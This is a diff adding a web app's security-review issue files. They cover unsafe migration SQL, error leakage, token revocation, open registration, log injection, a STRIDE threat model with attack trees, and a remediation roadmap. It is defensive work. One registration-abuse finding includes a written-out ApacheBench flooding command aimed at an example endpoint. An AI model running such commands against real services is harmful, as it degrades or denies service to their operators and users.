+`backend/app/main.py:_run_migrations` and `_run_data_migrations` apply schema changes at every app startup:
+
+```python
+conn.execute(text(f"ALTER TABLE {table} ADD COLUMN {column} {col_type}"))
+```
+
+Today the `table` / `column` / `col_type` values come from a **hardcoded list** — so no injection is actually possible. But the pattern is dangerous:
+
+- **Latent CWE-89.** If anyone later pipes a user-derived name into this loop (e.g. "per-group migration runs"), the f-string swallows it without complaint. Static analysers (bandit B608) probably flag this. Better to use a whitelisted column-type enum and psycopg/SQLAlchemy identifier quoting.
+- **Race across replicas.** In a multi-instance Railway deployment, all replicas run `_run_migrations` concurrently on boot. `Base.metadata.create_all` and `ALTER TABLE` are broadly idempotent but not transactional across replicas; PostgreSQL throws on duplicate-column and the `except OperationalError: logger.debug(...)` catches it silently — but silent exception swallowing of *any* OperationalError (not just duplicate-column) hides real failures.
+- **Swallow of OperationalError.** The current code treats every `OperationalError` as "already applied". A connection-refused, constraint violation, or serialization failure is logged at DEBUG and ignored.
+- **`alembic` is in requirements** but not wired in. Idiomatic migrations should happen in a one-shot job, not on every `lifespan` start.
+- **`create_all` at startup** creates missing tables outside a migration framework, which makes the schema diverge between "clean-install via SQLAlchemy models" and "migrated-from-scratch via alembic" over time.
+
+## Where
+
+- `backend/app/main.py:39-124` — migration loops.
+- `backend/app/main.py:127-137` — `lifespan` that always runs them.
+
+## Recommended fix
+
+### Use Alembic for real
+
+1. `alembic init backend/alembic` once.
+2. Move every row of `_MIGRATIONS` and `_TYPE_MIGRATIONS` into an Alembic revision.
+3. Replace `Base.metadata.create_all(bind=engine)` with nothing at runtime; let Alembic own the schema.
+4. Build a Railway "release command" (`railway.json` supports one) that runs `alembic upgrade head` once per deploy, before starting web containers. Railway's release phase is designed for this.
+
+### Belt-and-suspenders: narrow exception handling
+
+If the inline migrations must stay as a transition step:
+
+```python
+from sqlalchemy.exc import OperationalError, ProgrammingError
+
+ALLOWED_TYPES = {"REAL", "DATE", "INTEGER DEFAULT 0", "INTEGER DEFAULT 1",
+                 "BOOLEAN DEFAULT 0", "VARCHAR(8)", "INTEGER", "DOUBLE PRECISION"}
+
+_IDENT_RE = re.compile(r"^[a-z_][a-z0-9_]*$")
+
+def _valid(name: str) -> bool:
+    return bool(_IDENT_RE.match(name))
+
+
+def _run_migrations() -> None:
+    inspector = inspect(engine)
+    for table, column, col_type in _MIGRATIONS:
+        assert _valid(table) and _valid(column), f"invalid identifier: {table}.{column}"
+        assert col_type in ALLOWED_TYPES, f"disallowed type: {col_type}"
+        existing = [c["name"] for c in inspector.get_columns(table)]
+        if column in existing:
+            continue
+        try:
+            with engine.begin() as conn:
+                conn.execute(text(f'ALTER TABLE "{table}" ADD COLUMN "{column}" {col_type}'))
+        except (OperationalError, ProgrammingError) as exc:
+            msg = str(exc).lower()
+            if "already exists" in msg or "duplicate column" in msg:
+                logger.info("migration %s.%s already applied", table, column)
+            else:
+                logger.exception("migration %s.%s failed", table, column)
+                raise
+```
+
+### Cross-replica locking
+
+Before mutating, take an advisory lock:
+
+```python
+with engine.begin() as conn:
+    conn.execute(text("SELECT pg_advisory_lock(hashtext('rd-log-migrations'))"))
+    try:
+        _apply_migrations(conn)
+    finally:
+        conn.execute(text("SELECT pg_advisory_unlock(hashtext('rd-log-migrations'))"))
+```
+
+SQLite (single-writer by default) doesn't need this but multi-replica Postgres does.
+
+### Split create-all from migrations
+
+Make `Base.metadata.create_all` the default **only** in tests / local dev. In production, rely exclusively on migrations and fail fast if expected tables are missing.
+
+```python
+if settings.environment == "development" and settings.database_url.startswith("sqlite"):
+    Base.metadata.create_all(bind=engine)
+```
+
+### Don't run on every start
+
+Move migration execution out of `lifespan`. Two good options:
+
+- **Release command** on Railway (`"deploy": { "preDeployCommand": "alembic upgrade head" }`).
+- **Separate one-shot job** (`python -m app.migrate`) with a `--dry-run` flag.
+
+## Acceptance criteria
+
+- [ ] Alembic revisions exist for every row currently in `_MIGRATIONS` / `_TYPE_MIGRATIONS` / `_DATA_MIGRATIONS`.
+- [ ] `lifespan` no longer runs DDL.
+- [ ] Railway release phase runs `alembic upgrade head`; webapp container fails to start if schema is behind.
+- [ ] `pg_advisory_lock` (or engine-native equivalent) wraps any remaining inline migrations.
+- [ ] Tests assert the identifier-whitelist rejects injection-shaped names.
+
+## References
+
+- Alembic docs: https://alembic.sqlalchemy.org/
+- "Running schema migrations in a Kubernetes-like environment": https://engineering.atspotify.com/2019/01/ (pattern general to Railway too)
+- CWE-89: https://cwe.mitre.org/data/definitions/89.html

--- a/plans/git-issues/security-review/18-low-error-info-disclosure.md
+++ b/plans/git-issues/security-review/18-low-error-info-disclosure.md
@@ -1,0 +1,113 @@
+# [Low] Error messages leak implementation details
+
+**Severity:** 🟢 Low
+**CVSS v3.1 (estimated):** 3.7 — AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
+**CWEs:** CWE-209 (Generation of Error Message Containing Sensitive Information), CWE-200 (Exposure of Sensitive Information)
+**OWASP:** A05:2021 Security Misconfiguration, ASVS V7.4
+
+## Summary
+
+Several routers echo `str(exc)` back to the caller:
+
+- `backend/app/routers/book.py:141-145, 181-185, 200-203, 229-232, 249-252, 265-268` — `detail=str(exc)` for ValueError.
+- `backend/app/routers/topics.py:179-183` — `detail=str(e)`.
+- `backend/app/routers/setup.py:81-84` — `detail=str(e)`.
+- `backend/app/routers/settings.py:87-91` — `detail=str(exc)` including generate-invite-code failure.
+
+Today the ValueError messages come from handler-local logic and are relatively benign ("Assignment not found", "Invalid chapter IDs", "Index 5 out of range (0-3)"). The danger is two-fold:
+
+1. **Future regression.** The pattern encourages developers to let any internal exception bubble up. A future `ValueError("connection string must contain...")` could end up in a client response.
+2. **Stack-trace disclosure.** FastAPI's default exception handler returns a generic 500 in production **unless** `debug=True`. The `FastAPI(title=..., lifespan=...)` constructor leaves `debug` at its default (False) — good — but there is no explicit guard that turns it off. An operator who toggles debug while chasing a bug exposes full stack traces including file paths, library versions, and environment variables in repr form.
+3. **No request-id in errors.** When a real 500 happens, clients see "Internal Server Error" and operators have no correlation id to look up in logs.
+
+## Recommended fix
+
+### Uniform error envelope
+
+Wrap handlers with a small translation helper:
+
+```python
+# backend/app/errors.py
+from fastapi import HTTPException, Request
+from fastapi.responses import JSONResponse
+from uuid import uuid4
+import logging
+
+logger = logging.getLogger(__name__)
+
+class DomainError(ValueError):
+    """Safe-to-expose domain error. Message is returned verbatim."""
+
+
+async def unhandled_exception_handler(request: Request, exc: Exception) -> JSONResponse:
+    request_id = request.headers.get("x-request-id", str(uuid4()))
+    logger.exception("unhandled exception", extra={"request_id": request_id, "path": request.url.path})
+    return JSONResponse(
+        status_code=500,
+        content={"detail": "Internal server error", "request_id": request_id},
+    )
+```
+
+Register it:
+
+```python
+app.add_exception_handler(Exception, unhandled_exception_handler)
+```
+
+Then in handlers, raise `DomainError` for user-facing messages and let everything else 500:
+
+```python
+try:
+    set_book_position(db, current_user.group, body.assignment_index)
+except DomainError as exc:
+    raise HTTPException(400, str(exc)) from exc
+```
+
+Change `set_book_position` / `set_chapter_marker` / `update_assignment_chapters` / `delete_assignment` / `advance_book_position` to raise `DomainError(...)` instead of `ValueError(...)`. Ordinary bugs surface as 500 + request_id.
+
+### Request IDs
+
+```python
+# backend/app/middleware.py
+class RequestIdMiddleware(BaseHTTPMiddleware):
+    async def dispatch(self, request, call_next):
+        request_id = request.headers.get("x-request-id") or str(uuid.uuid4())
+        request.state.request_id = request_id
+        response = await call_next(request)
+        response.headers["x-request-id"] = request_id
+        return response
+```
+
+Include `request_id` in log lines and in error bodies; operators can now correlate a user's "it broke" with a single line in stdout logs.
+
+### Disable docs in production (optional)
+
+`/docs` and `/redoc` (FastAPI's Swagger UI / ReDoc) are enabled by default. Consider:
+
+```python
+app = FastAPI(
+    title=settings.app_name,
+    lifespan=lifespan,
+    docs_url="/docs" if settings.environment != "production" else None,
+    redoc_url=None,
+    openapi_url="/openapi.json" if settings.environment != "production" else None,
+)
+```
+
+Authenticated-only docs are also an option if the team uses them.
+
+### Harden 404/405 handlers
+
+Starlette's default HTTP 405 returns `Allow:` headers listing all methods. That's fine and useful. Just ensure 404 for unknown paths on `/api/*` returns the standard JSON shape rather than Starlette's text body.
+
+## Acceptance criteria
+
+- [ ] All public handlers use `DomainError` instead of `ValueError` for user-facing messages; other exceptions map to a uniform 500 response.
+- [ ] Every response includes an `x-request-id` header.
+- [ ] `/docs` / `/openapi.json` are disabled (or authenticated) in production.
+- [ ] Logs contain `request_id` for every request and are correlatable with client 500 responses.
+
+## References
+
+- OWASP Error Handling Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Error_Handling_Cheat_Sheet.html
+- CWE-209: https://cwe.mitre.org/data/definitions/209.html

--- a/plans/git-issues/security-review/19-low-logout-no-revocation.md
+++ b/plans/git-issues/security-review/19-low-logout-no-revocation.md
@@ -1,0 +1,117 @@
+# [Low] "Logout" is client-side only — tokens remain valid server-side
+
+**Severity:** 🟢 Low
+**CVSS v3.1 (estimated):** 3.1 — AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N
+**CWEs:** CWE-613 (Insufficient Session Expiration)
+**OWASP:** A07:2021 Identification and Authentication Failures, ASVS V3.5.2
+
+## Summary
+
+The frontend logout flow is:
+
+```ts
+// frontend/src/api/index.ts
+export function logout(): void {
+  setToken(null);
+}
+```
+
+There is no backend endpoint. If a user clicks "Log Out" on a shared device and the token was stolen beforehand, the attacker's copy of the token remains valid for up to 24 hours ([#05](./05-high-jwt-design-weaknesses.md)).
+
+The problem compounds with:
+
+- **No token revocation on password change** (there is no password-change endpoint at all — `POST /auth/register` is the only password-writing path).
+- **No "sign out of all sessions" control** for users who suspect compromise.
+- **Token stored in `localStorage`** ([#06](./06-high-token-storage-localstorage-xss.md)) — extractable by any XSS.
+
+## Where
+
+- `frontend/src/api/index.ts:54-56` — client-only logout.
+- `backend/app/routers/auth.py` — no logout endpoint.
+- `backend/app/auth.py:40-65` — no revocation list consulted.
+
+## Recommended fix
+
+### Revocation store
+
+A minimal design:
+
+```python
+# backend/app/models.py
+class RevokedToken(Base):
+    __tablename__ = "revoked_tokens"
+    jti: Mapped[str] = mapped_column(String(36), primary_key=True)
+    revoked_at: Mapped[datetime] = mapped_column(DateTime, default=lambda: datetime.now(UTC))
+    expires_at: Mapped[datetime] = mapped_column(DateTime, nullable=False, index=True)
+    # expires_at == original token exp → row can be purged after that time
+```
+
+Add a daily job (or on-access lazy cleanup) that deletes rows where `expires_at < now()`.
+
+### Endpoints
+
+```python
+# backend/app/routers/auth.py
+@router.post("/logout")
+def logout(
+    payload: dict = Depends(_verify_token_raw),   # returns the decoded payload, not the User
+    db: Session = Depends(get_db),
+) -> dict:
+    db.add(RevokedToken(jti=payload["jti"], expires_at=datetime.fromtimestamp(payload["exp"], UTC)))
+    db.commit()
+    log_activity(db, ..., action="user_logged_out")
+    return {"status": "ok"}
+
+
+@router.post("/logout-all")
+def logout_all(current_user: User = Depends(get_current_user), db: Session = Depends(get_db)) -> dict:
+    # Bump password_version so all pre-increment tokens fail validation
+    current_user.password_version = (current_user.password_version or 0) + 1
+    db.commit()
+    log_activity(db, ..., action="user_logged_out_all")
+    return {"status": "ok"}
+
+
+@router.post("/change-password")
+def change_password(body: PasswordChange,
+                    current_user: User = Depends(get_current_user),
+                    db: Session = Depends(get_db)) -> dict:
+    if not verify_password(body.old_password, current_user.hashed_password):
+        raise HTTPException(401, "Old password incorrect")
+    current_user.hashed_password = hash_password(body.new_password)
+    current_user.password_version = (current_user.password_version or 0) + 1   # invalidate old tokens
+    db.commit()
+    return {"status": "ok"}
+```
+
+Add `password_version` to `User` (default 0). Include it in `create_access_token` as `pv`; in `get_current_user`, require `payload["pv"] == user.password_version`.
+
+### Frontend wiring
+
+```ts
+// frontend/src/api/index.ts
+export async function logout(): Promise<void> {
+  try { await api.post("/auth/logout"); }
+  catch { /* ignore — we still clear the client state */ }
+  setToken(null);
+}
+```
+
+Add a "Log out of all sessions" button in Settings.
+
+### With cookies ([#06](./06-high-token-storage-localstorage-xss.md))
+
+The logout endpoint clears the cookies via `Set-Cookie: rd_log_token=; Max-Age=0`. Browser-side storage is never exposed to JS.
+
+## Acceptance criteria
+
+- [ ] `POST /auth/logout` revokes the current JWT's `jti` in the DB.
+- [ ] A revoked JWT used in `Authorization: Bearer` returns 401.
+- [ ] `POST /auth/logout-all` invalidates every token for the user (by bumping `password_version`).
+- [ ] `POST /auth/change-password` invalidates all pre-change tokens.
+- [ ] Retention job purges expired rows from `revoked_tokens`.
+
+## References
+
+- OWASP Session Management Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html
+- RFC 7009 (Token Revocation): https://datatracker.ietf.org/doc/html/rfc7009

--- a/plans/git-issues/security-review/20-low-self-registration-open.md
+++ b/plans/git-issues/security-review/20-low-self-registration-open.md
@@ -1,0 +1,61 @@
+# [Low] Open self-registration with immediate group creation
+
+**Severity:** 🟢 Low (high depending on deployment model)
+**CWEs:** CWE-284 (Improper Access Control), CWE-770 (Allocation of Resources Without Limits)
+**OWASP:** ASVS V2.1.14
+
+## Summary
+
+`POST /auth/register` (no `invite_code`) creates a brand-new `Group`, seeds it with default topics + chapters, and logs the user in — with no email verification, no administrative approval, no CAPTCHA, and no rate limit ([#04](./04-high-no-auth-rate-limiting.md)).
+
+Attackers or even well-meaning scripts can create unbounded groups. This consumes database rows, adds seed-topic fanout, and pollutes the `groups` table with unused data. If the app is deployed in a single-tenant model (one organization owns the instance), every self-registration is an unwanted account; if it's deployed as a public service, every such registration is fine but should have guardrails.
+
+Today:
+- `Group` rows are never deleted anywhere in the codebase.
+- `Topic` and `BookChapter` rows (10 topics + 39 chapters per new group) are seeded from `app/seed.py`.
+- Activity logs and meeting logs compound over time.
+
+## Attack narrative
+
+- A nuisance actor runs `ab -c 10 -n 10000 -p reg.json -T application/json https://rd-log.example.com/api/auth/register`.
+- Database fills with 10,000 groups, 100,000 topics, 390,000 chapters, 10,000 users.
+- No abuse detection fires. The app stays running but becomes slow and expensive.
+
+## Recommended fix
+
+### Choose a deployment model and enforce it
+
+The product should have a deliberate posture. Pick one:
+
+**Single-tenant (likely the intended model).** Lock registration to:
+
+- Initial bootstrap: during deploy, run a one-off CLI (`python -m app.bootstrap <admin-username>`). No self-registration thereafter.
+- Existing admins invite new members via invite codes ([#11](./11-medium-invite-code-abuse.md)).
+- `/auth/register` either: (a) is removed, or (b) is guarded by `settings.allow_self_registration` default False.
+
+**Multi-tenant public service.**
+
+- Require email verification before the account is usable.
+- Rate-limit registration per IP (5/hour) and per email domain (20/hour).
+- Add a simple CAPTCHA (hCaptcha / Cloudflare Turnstile) on the register form.
+- Add a "group creation" approval step, separate from "user creation": a user registers; to create a new group they must additionally be approved or must verify a domain.
+- Soft-delete idle groups (no members, no activity for 30 days).
+
+### Immediate mitigations (either model)
+
+- Rate limit `/auth/register` to 3/min, 10/hour per IP.
+- Introduce a feature flag `RD_LOG_ALLOW_SELF_REGISTRATION` (env-driven) that defaults to `false` in production.
+- Add a CAPTCHA challenge to the register form when the flag is `true`.
+- Add an admin-only API to list and delete orphan groups.
+
+## Acceptance criteria
+
+- [ ] A `RD_LOG_ALLOW_SELF_REGISTRATION` env var controls access to `/auth/register` (404 when disabled).
+- [ ] When enabled, the endpoint requires CAPTCHA and is rate-limited.
+- [ ] Admin endpoint `DELETE /admin/groups/{id}` exists and purges orphan groups.
+- [ ] Integration test proves that with the flag off, register returns 404.
+
+## References
+
+- OWASP Authentication Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html
+- "Why open signup is a decision, not a default" — various — add internal docs link.

--- a/plans/git-issues/security-review/21-low-activity-log-injection.md
+++ b/plans/git-issues/security-review/21-low-activity-log-injection.md
@@ -1,0 +1,88 @@
+# [Low] Activity-log `details` field is user-controlled and unsanitised
+
+**Severity:** 🟢 Low
+**CWEs:** CWE-117 (Improper Output Neutralization for Logs), CWE-93 (CRLF Injection)
+**OWASP:** ASVS V7.3.1
+
+## Summary
+
+`log_activity(db, group, user, action, details=...)` writes the `details` field verbatim to `ActivityLog.details`. Values flowing in include:
+
+- `topic.name` on `topic_drawn` (user-controlled; see [#02](./02-critical-stored-xss-html-export.md)).
+- `f"{schedule_in.speaker_name} on {schedule_in.meeting_date}"` on `speaker_scheduled`.
+- `str(cancel.meeting_date)` on `meeting_cancelled` / `meeting_restored` (safe).
+- `str(meeting_date)` on `speaker_removed` (safe).
+
+Two concerns:
+
+1. **Log-injection (CWE-117).** If logs are later rendered to a plain-text console, piped to an aggregator that doesn't properly JSON-encode lines, or printed into an ops chat, embedded newlines/CR/ANSI escapes can forge fake log lines, obscure real ones, or execute terminal commands in legacy viewers. Python's stdlib logging is structured enough to mostly avoid this but the DB column itself stores raw user input for later re-rendering.
+2. **Fan-out into XSS sinks.** If any future UI renders `details` with `dangerouslySetInnerHTML` or passes it through a markdown renderer without sanitisation, XSS re-opens via this vector. React 19's default auto-escaping covers today's `details` rendering in the Log page, but the hazard is latent.
+
+## Where
+
+- `backend/app/services.py:54-72` — `log_activity`.
+- `backend/app/routers/topics.py:142` — `log_activity(... "topic_drawn", topic.name)`.
+- `backend/app/routers/speakers.py:119-125` — `log_activity(... "speaker_scheduled", f"{name} on {date}")`.
+- `backend/app/routers/meetings.py:115-123` — meeting_cancelled / meeting_restored.
+- `backend/app/routers/settings.py:67` — settings_updated.
+
+## Recommended fix
+
+### Sanitise on write
+
+```python
+import re
+
+_CONTROL_RE = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")
+
+def _safe_details(value: str | None) -> str | None:
+    if value is None:
+        return None
+    # Strip ANSI escapes and C0 control chars. Keep newlines? → collapse to spaces.
+    cleaned = _CONTROL_RE.sub("", value)
+    cleaned = cleaned.replace("\r", " ").replace("\n", " ").strip()
+    return cleaned[:1000]  # hard cap
+
+
+def log_activity(db, group, user, action, details=None) -> None:
+    try:
+        db.add(ActivityLog(group_id=group.id, user_id=user.id,
+                           action=action, details=_safe_details(details)))
+        db.commit()
+    except Exception:
+        db.rollback()
+        logger.exception("audit log write failed")
+```
+
+### Structure the payload
+
+Instead of a free-text `details` string, use JSON:
+
+```python
+class ActivityLog(Base):
+    ...
+    payload: Mapped[dict | None] = mapped_column(JSONB, nullable=True)   # or JSON for SQLite
+```
+
+```python
+log_activity(db, group, user, "speaker_scheduled",
+             payload={"speaker_name": name, "meeting_date": str(date)})
+```
+
+UI renders fields individually (inherently safe via React auto-escape).
+
+### Safe rendering
+
+- The Log/Activity UI uses plain text interpolation (React auto-escape). Keep it that way; do not introduce a markdown renderer on audit log text.
+- If an export ever prints audit rows into HTML (printable report), use the same autoescape-on-by-default template approach as [#02](./02-critical-stored-xss-html-export.md).
+
+## Acceptance criteria
+
+- [ ] `ActivityLog.details` contains no control characters after a handler writes user-supplied text with newlines / tabs / ANSI escapes (integration test).
+- [ ] Details length is capped at 1000 characters.
+- [ ] (Optional) `payload` column replaces unstructured `details`; migration copies existing data into `{"details": "..."}`.
+
+## References
+
+- OWASP Logging Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html#data-to-exclude
+- CWE-117: https://cwe.mitre.org/data/definitions/117.html

--- a/plans/git-issues/security-review/22-informational-threat-model.md
+++ b/plans/git-issues/security-review/22-informational-threat-model.md
@@ -1,0 +1,153 @@
+# [Informational] Threat model — STRIDE for Recovery Dharma Secretary Log
+
+## Assets
+
+| Asset | Sensitivity | Location |
+|-------|-------------|----------|
+| User credentials (bcrypt hashes) | High | `users.hashed_password` |
+| JWTs (in flight & in `localStorage`) | High | HTTP `Authorization`, browser storage |
+| Group membership (the "who is in a recovery meeting" list) | **High** — strongly sensitive by community norms, though not regulated PHI | `users`, `activity_log` |
+| Speaker names & meeting history | Medium–High | `meeting_logs`, `activity_log` |
+| Dana (donation) amounts | Medium | `meeting_logs.attendance_count` (aliased) |
+| Group settings & invite codes | Medium | `groups.invite_code`, `groups.*` |
+| Source code + deploy config | Medium | GitHub repo, Railway |
+| Signing key (`RD_LOG_SECRET_KEY`) | **Critical** | Env var on Railway |
+
+## Trust boundaries
+
+```
+  ┌───────────────────┐      HTTPS (Railway TLS edge)      ┌────────────────────────┐
+  │ Browser (user)    │ ───────────────────────────────────▶ FastAPI / Uvicorn        │
+  │  SPA: React 19    │                                    │  ├─ /api/* routers       │
+  │  token in LS      │  ◀────────────────────────────────  │  ├─ JWT validation       │
+  └───────────────────┘        CORS boundary                 │  └─ ORM (SQLAlchemy)     │
+           ▲                                                 └──────────┬──────────────┘
+           │                                                            │
+      public internet                                                   │ SQL
+           │                                                            ▼
+           │                                                 ┌───────────────────────┐
+  ┌───────────────────┐                                      │ SQLite (dev)          │
+  │ GitHub (repo,     │   Actions OIDC / OAuth token          │ Postgres (prod)       │
+  │ Actions runners)  │ ────────────────────────────────────▶ │                       │
+  └───────────────────┘                                       └───────────────────────┘
+```
+
+## Actors
+
+- **Unauthenticated visitor** — hits `/api/*` without a token, or the SPA bundle.
+- **Group member** — authenticated user associated with one group; can read/write every data row for that group.
+- **(Future) Group admin** — see [#12](./12-medium-no-rbac-or-admin-roles.md); role does not exist today.
+- **Operator** — person who sets environment variables on Railway, can read the DB, can merge code.
+- **GitHub user (non-member)** — can comment on issues and potentially trigger workflows ([#16](./16-medium-github-actions-abuse.md)).
+- **Third-party supply chain** — npm/PyPI, GitHub Actions marketplace, Google Fonts (Lato).
+
+## STRIDE — per-component summary
+
+### Browser SPA
+
+| Threat | Description | Finding |
+|--------|-------------|---------|
+| **S**poofing | XSS steals token, impersonates user | #02, #06 |
+| **T**ampering | DOM injection via uncontrolled input | #02 |
+| **R**epudiation | User denies action; activity log not ironclad | #13 |
+| **I**nformation disclosure | Referer leak, 3rd-party requests (Google Fonts) | #07 |
+| **D**enial of service | Unbounded API calls from the SPA | #04 |
+| **E**levation | XSS + open CORS → access to other origins | #02, #06, #07, #09 |
+
+### FastAPI backend
+
+| Threat | Description | Finding |
+|--------|-------------|---------|
+| **S**poofing | Forged JWT using dev secret | #01 |
+| **T**ampering | CSV / HTML output injection | #02, #03, #21 |
+| **R**epudiation | Audit log failures swallowed | #13 |
+| **I**nformation disclosure | Username enumeration, error detail leakage | #10, #18 |
+| **D**enial of service | Brute force, expensive endpoints, unbounded weeks | #04, #11 |
+| **E**levation | Any member = admin; invite-code guess → join | #11, #12 |
+
+### Database
+
+| Threat | Description | Finding |
+|--------|-------------|---------|
+| **T**ampering | DDL at startup; race across replicas | #17 |
+| **R**epudiation | Audit log on same DB, mutable | #13 |
+| **I**nformation disclosure | Default SQLite on disk in container | #15 |
+| **D**oS | Schema migrations run concurrently | #17 |
+
+### CI/CD & Supply chain
+
+| Threat | Description | Finding |
+|--------|-------------|---------|
+| **S**poofing | Fake `@claude` trigger from any GitHub user | #16 |
+| **T**ampering | Moving-tag Actions, unpinned dep versions | #14, #16 |
+| **R**epudiation | No signed commits / SBOM / attestation | #14 |
+| **I**nformation disclosure | Build artefacts / OIDC tokens in logs | #16 |
+| **D**oS | CI cost abuse | #16 |
+| **E**levation | Prompt injection to Claude Actions | #16 |
+
+## Attack trees (selected)
+
+### A1. Take over a group
+
+```
+Take over group
+├── 1. Forge JWT
+│   └── 1a. Operator forgets RD_LOG_ENVIRONMENT=production  ⇒ dev secret in use  (#01)
+├── 2. Steal a member's token
+│   ├── 2a. XSS via printable export payload             (#02)
+│   └── 2b. Trick user into running a malicious bookmarklet; localStorage exposed  (#06)
+├── 3. Guess a member's password
+│   ├── 3a. Weak password + no rate limit              (#04, #08)
+│   └── 3b. Breached password reused                    (#08)
+└── 4. Brute-force an invite code and self-join
+    └── 4a. No rate limit; codes never expire           (#11, #04)
+```
+
+### A2. Exfiltrate meeting attendance data
+
+```
+Exfiltrate data
+├── 1. Any of A1 (gain member access)
+├── 2. Dev secret → full read of any group               (#01)
+└── 3. Supply-chain attack
+    ├── 3a. Compromised Action @v4 tag                    (#14, #16)
+    └── 3b. Compromised dep in >= range                   (#14)
+```
+
+### A3. DoS / cost attack
+
+```
+DoS
+├── 1. Unauth: hammer /auth/login (bcrypt ~80ms each, no limit)  (#04)
+├── 2. Unauth: hammer /auth/register (creates Group + 49 seed rows each)  (#20)
+├── 3. Auth:   /meetings/upcoming/lookahead?weeks=12 in a loop  (#04)
+└── 4. Auth:   /export/printable with wide date range           (#04)
+```
+
+## Data-flow diagram (simplified)
+
+```
+Browser (1) ──HTTP, JWT──▶ FastAPI (2) ──ORM──▶ DB (3)
+           ◀──JSON/HTML──                     ◀──rows──
+
+Static (2a) ──serve SPA──▶ Browser
+
+GitHub (4) ──webhook/event──▶ Actions runner (5) ──OAuth token──▶ Anthropic/GitHub APIs
+```
+
+Trust boundaries to watch:
+- 1↔2 (JWT verification, CORS, CSP)
+- 2↔3 (migrations, injection surface, connection string secret)
+- 4↔5 (workflow triggers, secret leakage)
+- 5↔Anthropic (prompt injection)
+
+## Out-of-scope for this threat model
+
+- Detailed cryptanalysis of bcrypt/argon2.
+- Supply-chain attacks on Railway itself.
+- Physical access to operator's machine.
+- GDPR / HIPAA / other regulatory positioning (the product declares no special compliance posture).
+
+## How to use this model
+
+When reviewing a new feature, walk each STRIDE category for each component it touches, and tag every identified threat with either (a) a mitigating control that already exists, (b) a new control you are adding in this PR, or (c) an issue reference deferring it. Require an explicit written note from the author before merging for any (c).

--- a/plans/git-issues/security-review/23-informational-remediation-roadmap.md
+++ b/plans/git-issues/security-review/23-informational-remediation-roadmap.md
@@ -1,0 +1,72 @@
+# [Informational] Remediation roadmap
+
+A phased plan that sequences the findings so each phase delivers a real security improvement without blocking on the next.
+
+## Phase 0 — Halt the bleeding (same-day)
+
+Do these today; they have low code cost and outsized impact.
+
+- [ ] **#01 — Remove the hardcoded dev JWT fallback.** Fail-closed when `RD_LOG_SECRET_KEY` is unset, regardless of `RD_LOG_ENVIRONMENT`.
+- [ ] **#02 — HTML-escape all interpolation in the printable export.** Port to Jinja2 autoescape.
+- [ ] **#03 — Use the `csv` module + formula-prefix neutralisation** in the CSV export.
+- [ ] **Audit-fix:** Run a manual check that no production deployment is currently running on the dev secret; rotate if so.
+- [ ] Write release notes explaining the breaking config change.
+
+## Phase 1 — Authentication & session hardening (week 1)
+
+- [ ] **#04 — Add `slowapi` rate limiting** on `/auth/*` and expensive read endpoints.
+- [ ] **#08 — Strengthen password policy** and prevent bcrypt 72-byte silent truncation.
+- [ ] **#10 — Make register and login responses indistinguishable**; add dummy bcrypt on existing-username path.
+- [ ] **#19 — Add `/auth/logout`, `/auth/change-password`, `/auth/logout-all`** with revocation via `jti` blocklist + `password_version`.
+- [ ] **#05 — Shorten access-token TTL to 60 minutes**; add a refresh-token flow; add `iss`, `aud`, `jti`, `iat`, `nbf` claims.
+
+## Phase 2 — Defence-in-depth in the browser (week 2)
+
+- [ ] **#07 — Security-headers middleware** (CSP, HSTS, X-Content-Type-Options, Referrer-Policy, Permissions-Policy, Cross-Origin-*-Policy).
+- [ ] **#06 — Migrate from `localStorage` to httpOnly cookies** + double-submit CSRF token.
+- [ ] **#09 — Tighten CORS** (explicit methods/headers; validate origin entries; remove CORS entirely on the same-origin production mount).
+- [ ] **Self-host Lato font** to tighten `font-src` in CSP.
+
+## Phase 3 — Access control & multi-tenancy (week 3)
+
+- [ ] **#12 — Introduce `User.role`** (`admin`, `secretary`, `member`) and gate mutation endpoints.
+- [ ] **#11 — Invite codes: expire (24h default), single-use by default, hashed at rest**, with notification to existing members on join.
+- [ ] **#20 — Gate self-registration** behind a feature flag; require CAPTCHA when enabled.
+- [ ] **#18 — Error envelope** with request IDs and a uniform 500 handler.
+
+## Phase 4 — Operational & supply chain (week 4)
+
+- [ ] **#14 — Hash-pin dependencies** (`pip-audit` in CI, `npm audit` in CI, Dependabot for pip/npm/actions/docker, CodeQL, SBOM, gitleaks).
+- [ ] **#15 — Dockerfile hardening** (non-root user, drop pip, exec form, pinned digests).
+- [ ] **#16 — GitHub Actions hardening** (author-association guard, SHA-pinning, least-privilege `GITHUB_TOKEN`, workflow_run split-pattern).
+- [ ] **#17 — Alembic migrations** + Railway release command + advisory locks.
+- [ ] **#13 — Audit log** within-transaction commit, structured fallback to stdout, log more events, retention policy.
+- [ ] **#21 — Sanitise `details` field** (control-char strip, length cap).
+
+## Phase 5 — Assurance (ongoing)
+
+- [ ] **#24 — Add security-focused tests** (see that file).
+- [ ] **Red-team exercise**: an internal or external tester attempts the attack trees in [`22-informational-threat-model.md`](./22-informational-threat-model.md).
+- [ ] **Quarterly dependency review** tied to a calendar reminder.
+- [ ] **Security runbook** in `docs/operations/`:
+  - Secret rotation SOP.
+  - Incident response: what to do when a token / invite code / DB is exposed.
+  - Operator-visible logs & how to read them.
+
+## "What gets us on the open internet" bar
+
+Minimum to consider the app safe to serve to the public internet:
+- Phase 0 and Phase 1 done.
+- `#07` (CSP) done.
+- Deployment is running with `RD_LOG_ENVIRONMENT=production`, a rotated `RD_LOG_SECRET_KEY` ≥ 256 bits, and Railway-managed Postgres (not SQLite).
+- Dependabot alerts for critical vulns are zero.
+- CI pipeline includes `pip-audit` / `npm audit` (at least warning, then fail).
+
+## Estimation guidance
+
+Most items are small surgical changes. The largest (in engineering time) are:
+- **#06 (httpOnly cookies + CSRF)** — touches backend auth, frontend client, and every POST/PUT/DELETE call.
+- **#12 (RBAC)** — DB migration, route annotations, UI guards.
+- **#17 (Alembic)** — initial migration generation and docs, then ongoing discipline.
+
+Everything else is in the tens-of-minutes-to-half-day range.

--- a/plans/git-issues/security-review/24-informational-security-testing-gaps.md
+++ b/plans/git-issues/security-review/24-informational-security-testing-gaps.md
